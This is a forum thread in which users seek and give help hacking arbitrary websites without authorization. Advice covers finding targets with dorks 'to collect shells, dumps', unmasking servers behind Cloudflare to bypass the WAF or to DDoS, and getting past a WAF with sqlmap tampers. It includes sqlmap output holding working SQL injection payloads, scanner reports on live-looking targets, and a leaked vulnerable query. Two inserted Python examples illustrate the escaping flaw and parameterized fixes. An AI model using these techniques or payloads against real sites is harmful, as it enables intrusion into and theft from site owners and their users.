
[web-hacking] Your questions

Hello
Here is the toolkit I have:
Sqlmap, Burp Suite, Skipfish, IronWASP, OWASP ZAP, w3af, BeEF, XSSer
Tell me where a beginner should start and what can safely be crossed off the list
The goal is hacking a website
To begin with, read up on what each tool is for and work out how they differ. Better still, understand how they work and go from there.
Hacking the site from which side? Admin panel/dump?
 
Hello
Here is the toolkit I have:
Sqlmap, Burp Suite, Skipfish, IronWASP, OWASP ZAP, w3af, BeEF, XSSer
Tell me where a beginner should start and what can safely be crossed off the list
The goal is hacking a website
"Hacking a website" is an abstract notion.
Do you want to hack one specific site of one specific school? Or do you just need to collect shells, dumps, etc. for something else?

If the latter, first pick one vulnerability (either some RCE in an engine or its modules, or SQLi), then parse sites from search results using dorks or just check a list by domain zone, and then break them, you can even do it by hand.
 
This may be a silly question, but why determine the IP of a server behind Cloudflare? What interesting things can be found?
Vulnerable neighbours on the same server or vulnerable services (cPanel, phpMyAdmin, FTP, etc.).
 
Vulnerable neighbours on the same server or vulnerable services (cPanel, phpMyAdmin, FTP, etc.).
Do I understand correctly that it is in order to look for vulnerable services on open ports on the IP itself, and there is a higher chance of finding something interesting there (they are less protected)?
 
Here's my trouble: before starting work sqlmap pings the site, and if there is no reply to the ping it gives a connection error and the work ends there. So the question is: is there a command that will force it to continue? jSQL has one, but I didn't find it here.
 
This may be a silly question, but why determine the IP of a server behind Cloudflare? What interesting things can be found?
Bypassing the Cloudflare WAF, geo filters, Bot Fight Mode and the JS Challenge, bypassing notifications (a paid-plan feature where you get e-mail notifications if the WAF detects attempts to exploit vulnerabilities on your site, or if you are being DDoSed), for successful exploitation of some vulnerability or for a DDoS.

Here's my trouble: before starting work sqlmap pings the site, and if there is no reply to the ping it gives a connection error and the work ends there
Pings in what sense? ICMP? It doesn't do that; the first request is always the domain resolution, the second request is an HTTP GET to the URL you specified. There is the --offline switch, but it only works when there is a valid session with saved data (database, table and column names). If the site works in your browser but you get timeouts through sqlmap, then the problem is either in the headers and cookies or in a WAF. And there is also the --ignore-timeouts switch.
 
Can anyone advise? I feed an SQL injection into sqlmap and it reports that the parameter is injectable, but at the end it says there is no vulnerability. I've left the sqlmap output below; I'd be grateful to anyone who helps.
Code:
[18:30:52] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[18:30:54] [INFO] testing for SQL injection on URI parameter '#1*'
[18:30:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:31:04] [INFO] URI parameter '#1*' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[18:31:04] [INFO] testing 'Generic inline queries'
[18:31:07] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[18:31:11] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[18:31:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[18:31:20] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[18:31:23] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[18:31:24] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[18:31:25] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[18:31:26] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[18:31:27] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:31:28] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:31:29] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[18:31:30] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[18:31:31] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[18:31:32] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[18:31:32] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[18:31:33] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[18:31:34] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[18:31:36] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[18:31:38] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[18:31:38] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[18:31:38] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[18:31:38] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[18:31:38] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[18:31:38] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[18:31:38] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[18:31:38] [INFO] testing 'MySQL inline queries'
[18:31:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[18:31:40] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[18:31:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[18:31:43] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[18:31:46] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[18:31:47] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[18:31:48] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[18:31:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[18:31:51] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[18:31:52] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[18:31:54] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[18:31:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[18:32:00] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[18:32:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[18:32:06] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[18:32:07] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK)'
[18:32:08] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query)'
[18:32:09] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK)'
[18:32:10] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query)'
[18:32:12] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (BENCHMARK - comment)'
[18:32:13] [INFO] testing 'MySQL > 5.0.12 AND time-based blind (heavy query - comment)'
[18:32:14] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment)'
[18:32:16] [INFO] testing 'MySQL > 5.0.12 OR time-based blind (heavy query - comment)'
[18:32:17] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[18:32:18] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[18:32:19] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[18:32:20] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[18:32:20] [INFO] testing 'MySQL AND time-based blind (ELT)'
[18:32:22] [INFO] testing 'MySQL OR time-based blind (ELT)'
[18:32:23] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[18:32:24] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[18:32:25] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[18:32:26] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[18:32:28] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[18:32:28] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[18:32:28] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (BENCHMARK)'
[18:32:28] [INFO] testing 'MySQL > 5.0.12 time-based blind - Parameter replace (heavy query - comment)'
[18:32:29] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[18:32:29] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[18:32:29] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[18:32:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[18:32:29] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[18:32:55] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[18:33:34] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[18:33:53] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[18:34:31] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[18:34:50] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
[18:35:16] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
[18:35:37] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
[18:36:20] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
[18:37:04] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
[18:37:25] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[18:37:51] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[18:38:24] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[18:38:47] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[18:39:08] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[18:39:32] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[18:39:51] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[18:40:17] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[18:40:45] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[18:41:07] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
[18:41:29] [INFO] checking if the injection point on URI parameter '#1*' is a false positive
[18:41:31] [WARNING] false positive or unexploitable injection point detected
[18:41:31] [WARNING] URI parameter '#1*' does not seem to be injectable
[18:41:31] [CRITICAL] all tested parameters do not appear to be injectable. As heuristic test turned out positive you are strongly advised to continue on with the tests
 
Can anyone advise? I feed an SQL injection into sqlmap and it reports that the parameter is injectable, but at the end it says there is no vulnerability. I've left the sqlmap output below; I'd be grateful to anyone who helps.
It could be anything here. You need to look at the specific target and at the output of the software you found it with in the first place (I assume Acunetix).
 
It could be anything here. You need to look at the specific target and at the output of the software you found it with in the first place (I assume Acunetix).
Code:
HTTP Request

GET /search?text=1'" HTTP/1.1
Referer: https://test.com/
Cookie: PHPSESSID=ucjccfngpjjak7vkc6np6lqvp2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36
Host: test.com
Connection: Keep-alive

HTTP Response


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 07 Apr 2022 15:03:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
X-Powered-By: PHP/7.2.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Original-Content-Encoding: gzip
Content-Length: 2522

<!--SELECT SQL_CALC_FOUND_ROWS a.article_id, a.user_id, a.header, ab.brief, a.search_header, a.published_at, CONCAT('/e/', a.search_header) as `href`, as.comments, as.views, as.likes, am.title, MATCH(asr.title, asr.header, asr.keywords, asr.description) AGAINST ('1\'\"') as `sort1`, MATCH(asr.`text`) AGAINST ('1\'\"') as `sort2`, u.page_name, IF(u.screen_name = '', u.page_name, u.screen_name) as `screen_name`
FROM `article` AS `a`
INNER JOIN `article_stat` AS `as` ON `as`.`article_id` = `a`.`article_id`
LEFT JOIN `article_meta` AS `am` ON `am`.`article_id` = `a`.`article_id`
LEFT JOIN `article_brief` AS `ab` ON `ab`.`article_id` = `a`.`article_id`
INNER JOIN `article_search` AS `asr` ON `asr`.`article_id` = `a`.`article_id` AND (MATCH(asr.title, asr.header, asr.keywords, asr.description) AGAINST ('1\\'\\"' IN BOOLEAN MODE) OR MATCH(asr.`text`) AGAINST ('1\\'\\"' IN BOOLEAN MODE))
INNER JOIN `user` AS `u` ON `u`.`user_id` = `a`.`user_id`
WHERE (`a`.`status_id` = '3')
ORDER BY sort1 DESC, sort2 DESC, a.published_at DESC, a.article_id DESC
LIMIT 10 OFFSET 0-->
<pre style="margin: 20px; padding: 20px; border: #CCC 1px dashed; line-height: 1.3;">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\"' IN BOOLEAN MODE) OR MATCH(asr.`text`) AGAINST ('1\\'\\"' IN BOOLEAN MODE))
' at line 6</pre><br />
<b>Fatal error</b>:  Uncaught Error: Call to a member function fetch_assoc() on boolean in /pub/home/grenouer/novi_expange/htdocs/__private/Exp/Db/Mysqli.php:184
Stack trace:
#0 /pub/home/grenouer/novi_expange/htdocs/__private/Exp/Taquro/AbstractTable.php(177): Exp\Db\Mysqli-&gt;fetchAssoc(false)
#1 /pub/home/grenouer/novi_expange/htdocs/__private/Site/Page/search.php(41): Exp\Taquro\AbstractTable-&gt;next()
#2 /pub/home/grenouer/novi_expange/htdocs/__private/Exp/Render/HtmlRender.php(189): Site\Page\search-&gt;execute()
#3 /pub/home/grenouer/novi_expange/htdocs/__private/Exp/Render/HtmlRender.php(72): Exp\Render\HtmlRender-&gt;tryOutput(Object(Site\Page\search))
#4 /pub/home/grenouer/novi_expange/htdocs/__private/Site/Front.php(197): Exp\Render\HtmlRender-&gt;output(Object(Site\Page\search))
#5 /pub/home/grenouer/novi_expange/htdocs/__private/Site/Front.php(108): Site\Front-&gt;render(Object(Site\Page\search))
#6 /pub/home/grenouer/novi_expange/htdocs/index.php(31): Site\Front-&gt;run()
#7 {main}
  thrown in <b>/pub/home/grenouer/novi_expange/htdocs/__private/Exp/Db/Mysqli.php</b> on line <b>184</b><br />
 
At first glance it looks like the issue is the escaping done by addslashes()
You have to dig into it by hand.
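The response posted above embeds the same input as `'1\'\"'` in the SELECT list and as `'1\\'\\"'` in the JOIN condition, and the MySQL error points at the second form. The Python model below is an added example, not code from the thread or from the site: `double_backslashes` is a hypothetical guess at what produces the second form, the literal scanner is a simplified model of MySQL's default string rules, and `sqlite3` stands in for a MySQL prepared statement.

```python
import sqlite3

USER_INPUT = "1'\""  # the value from the request on the page: 1'"


def addslashes(value: str) -> str:
    """Model of PHP addslashes(): prefix ', ", backslash and NUL with a backslash."""
    return "".join(
        "\\0" if ch == "\0" else ("\\" + ch if ch in "'\"\\" else ch)
        for ch in value
    )


def double_backslashes(value: str) -> str:
    """Hypothetical second pass (assumption): doubles every backslash
    but does not escape quotes again."""
    return value.replace("\\", "\\\\")


def read_mysql_string(sql: str, start: int):
    """Scan one single-quoted literal with backslash escapes enabled
    (MySQL default) and '' treated as an escaped quote.
    Returns (decoded value, index just past the closing quote)."""
    if sql[start] != "'":
        raise ValueError("no opening quote at start")
    value, i = [], start + 1
    while i < len(sql):
        ch = sql[i]
        if ch == "\\" and i + 1 < len(sql):
            value.append(sql[i + 1])  # simplified: \n, \t etc. are not decoded
            i += 2
        elif ch == "'":
            if sql[i + 1:i + 2] == "'":
                value.append("'")
                i += 2
            else:
                return "".join(value), i + 1
        else:
            value.append(ch)
            i += 1
    raise ValueError("unterminated string literal")


def split_fragment(escaped: str):
    """Embed an escaped value the way the leaked query does and return
    (value the server sees, SQL text left over after the literal)."""
    fragment = "AGAINST ('" + escaped + "' IN BOOLEAN MODE)"
    value, end = read_mysql_string(fragment, fragment.index("'"))
    return value, fragment[end:]


def demo_db():
    """Constructed sample data, one row containing the raw input."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE article_search (article_id INTEGER, title TEXT)")
    conn.executemany(
        "INSERT INTO article_search VALUES (?, ?)",
        [(1, "plain title"), (2, "title with 1'\" inside")],
    )
    return conn


def search_bound(conn, text: str):
    """The fix: the value travels as a bound parameter, so no escaping
    pass in the application can end up out of step with the SQL parser."""
    rows = conn.execute(
        "SELECT article_id FROM article_search WHERE title LIKE '%' || ? || '%'",
        (text,),
    )
    return [row[0] for row in rows]


if __name__ == "__main__":
    once = addslashes(USER_INPUT)
    twice = double_backslashes(once)
    for label, escaped in (("escaped once", once), ("backslashes doubled", twice)):
        value, leftover = split_fragment(escaped)
        print(f"{label}: literal={value!r} leftover={leftover!r}")
    print("bound parameter:", search_bound(demo_db(), USER_INPUT))
```
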
 
Code:
sqlmap.py -u "https://test.net/statistics/geographical/map/accidentmap.php?type=1*" --level=5 --risk=3 --random-agent --batch --dbs
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.6.4.2#dev}
|_ -| . [,]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:09:44 /2022-04-19/

[14:09:44] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729) FirePHP/0.3' from file 'C:\Users\Downloads\sqlmapproject-sqlmap-1.6.4-2-gd5fb92e\sqlmapproject-sqlmap-d5fb92e\data\txt\user-agents.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[14:09:44] [INFO] resuming back-end DBMS 'mysql'
[14:09:44] [INFO] testing connection to the target URL
[14:09:47] [WARNING] the web server responded with an HTTP error code (403) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - comment)
    Payload: https://test.net:443/statistics/geographical/map/accidentmap.php?type=1' OR NOT 6598=6598-- -

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: https://test.net:443/statistics/geographical/map/accidentmap.php?type=1' AND (SELECT 4362 FROM(SELECT COUNT(*),CONCAT(0x716a786a71,(SELECT (ELT(4362=4362,1))),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NmOx

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)
    Payload: https://test.net:443/statistics/geographical/map/accidentmap.php?type=1' OR SLEEP(5)#
---
[14:09:47] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0
[14:09:47] [INFO] fetching database names
[14:10:08] [WARNING] the SQL query provided does not return any output
[14:10:08] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[14:10:08] [INFO] fetching number of databases
[14:10:08] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:10:08] [INFO] retrieved:
[14:10:09] [WARNING] unexpected HTTP code '403' detected. Will use (extra) validation step in similar cases

[14:10:15] [WARNING] time-based comparison requires larger statistical model, please wait................ (done)
[14:10:57] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[14:10:59] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

[14:11:04] [ERROR] unable to retrieve the number of databases
[14:11:04] [INFO] falling back to current database
[14:11:04] [INFO] fetching current database
[14:11:04] [INFO] resumed: ''
[14:11:04] [CRITICAL] unable to retrieve the database names
[14:11:04] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 34 times
I've started working on another target and I don't understand: it finds the vulnerability and works it, but when I enter --dbs or --banner or other queries it gives me this
 
403 (Forbidden) - 34 times
I think it's all obvious. It looks like a WAF; again, you need to check by hand and try to bypass it.
Alternatively, if it's not a WAF it may be rate limiting; that also has to be checked manually.
 
I think it's all obvious. It looks like a WAF; again, you need to check by hand and try to bypass it.
Alternatively, if it's not a WAF it may be rate limiting; that also has to be checked manually.
There's no WAF there. I'm not strong at working injections by hand. Could you recommend some good articles?
 
I think it's all obvious. It looks like a WAF; again, you need to check by hand and try to bypass it.
Alternatively, if it's not a WAF it may be rate limiting; that also has to be checked manually.
Or I can send you the SQL injection; if it's not too much trouble, would you help work through it?
 
There's no WAF there
In the end there turned out to be a WAF there that triggers on the words CONCAT, UNION, ALL, SELECT, NULL and so on. It returns a 406 error. It is bypassed with the randomcase and modsecurityversioned tampers. I've sent detailed info by PM.
 
Good day!
Please tell me how to compose the sqlmap command for a vulnerability like this
Code:
URL:https://test.com/Parameter:/<n>/<n>/<n>/[*]-<n>-<n>/
[HEADING=3]Attack Details[/HEADING]
Path Fragment input /<n>/<n>/<n>/[*]-<n>-<n>/ was set to f'|a|'1-williams-interested-in-signing-oscar-piastri-from-alpine-in

Tests performed:
[LIST]
[*]f1-williams-interested-in-signing-oscar-piastri-from-alpine-in'||' => TRUE
[*]f1-williams-interested-in-signing-oscar-piastri-from-alpine-in'|||' => FALSE
[*]f1-williams-interested-in-signing-oscar-piastri-from-alpine-in'||''||' => TRUE
[*]f1-williams-interested-in-signing-oscar-piastri-from-alpine-in'||'000190'||' => FALSE
[*]'||''||'f1-williams-interested-in-signing-oscar-piastri-from-alpine-in => TRUE
[*]zzz'||'000190'||'f1-williams-interested-in-signing-oscar-piastri-from-alpine-in => FALSE
[*]f1-williams-interested-in-signing-oscar-piastri-from-alpine-in000190 => FALSE
[*]f'||'1-williams-interested-in-signing-oscar-piastri-from-alpine-in => TRUE
[*]f'|a|'1-williams-interested-in-signing-oscar-piastri-from-alpine-in => FALSE
[/LIST]


Original value: f1-williams-interested-in-signing-oscar-piastri-from-alpine-in

[HEADING=3]Vulnerability Description[/HEADING]
arrow_drop_up
SQL injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements that control a web application's database server.
Discovered by  SQL Injection 
[HEADING=3]HTTP Request[/HEADING]
arrow_drop_up
content_copy
GET /2022/04/26/f'|a|'1-williams-interested-in-signing-oscar-piastri-from-alpine-in-2023-16538494/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://test.com/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36
Host: test.com
Connection: Keep-alive
 
Same as usual, just try injecting here:
Code:
https://site.com/2022/04/26/f*1-williams-interested-in-signing-oscar-piastri-from-alpine-in-2023-16538494/
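Why the scanner report above shows that TRUE/FALSE pattern, and what removes it, as an added example that is not part of the thread: a slug lookup built by string concatenation next to a parameterized one, run against the report's nine test values. The table, handler names and the use of SQLite (where `||` is string concatenation) are assumptions made for the sketch.

```python
import re
import sqlite3

# Original value from the report; the table and handlers are constructed.
SLUG = "f1-williams-interested-in-signing-oscar-piastri-from-alpine-in"
# The nine "Tests performed" values, in the report's order.
PROBES = [
    SLUG + "'||'", SLUG + "'|||'", SLUG + "'||''||'", SLUG + "'||'000190'||'",
    "'||''||'" + SLUG, "zzz'||'000190'||'" + SLUG, SLUG + "000190",
    "f'||'" + SLUG[1:], "f'|a|'" + SLUG[1:],
]
SLUG_RE = re.compile(r"[a-z0-9]+(?:-[a-z0-9]+)*")


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (slug TEXT PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO articles VALUES (?, ?)", (SLUG, "constructed"))
    return db


def lookup_vulnerable(db, slug):
    # Unsafe on purpose: the path fragment becomes part of the SQL text,
    # so 'a'||'b' is evaluated by the database as string concatenation.
    sql = "SELECT title FROM articles WHERE slug = '" + slug + "'"
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # a SQL error is rendered as "page not found"


def lookup_hardened(db, slug):
    # Allow-list the slug format, then bind it as data, never as SQL text.
    if not SLUG_RE.fullmatch(slug):
        return False
    cur = db.execute("SELECT title FROM articles WHERE slug = ?", (slug,))
    return cur.fetchone() is not None


def probe_results(lookup):
    """Page found (True) or not (False) for each of the report's test values."""
    db = make_db()
    return [lookup(db, p) for p in PROBES]


if __name__ == "__main__":
    for name, fn in (("vulnerable", lookup_vulnerable), ("hardened", lookup_hardened)):
        print(name, probe_results(fn))
```

The concatenating handler reproduces the report's TRUE/FALSE column exactly, while the parameterized handler answers "not found" to every test value and still serves the original slug.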
 
Is there a way to find old and/or unpopular sites, since they are more vulnerable (Google dorks don't count)? I'd like to get a bit of practice. For the new and popular ones that Google returns, I don't have enough knowledge.
 

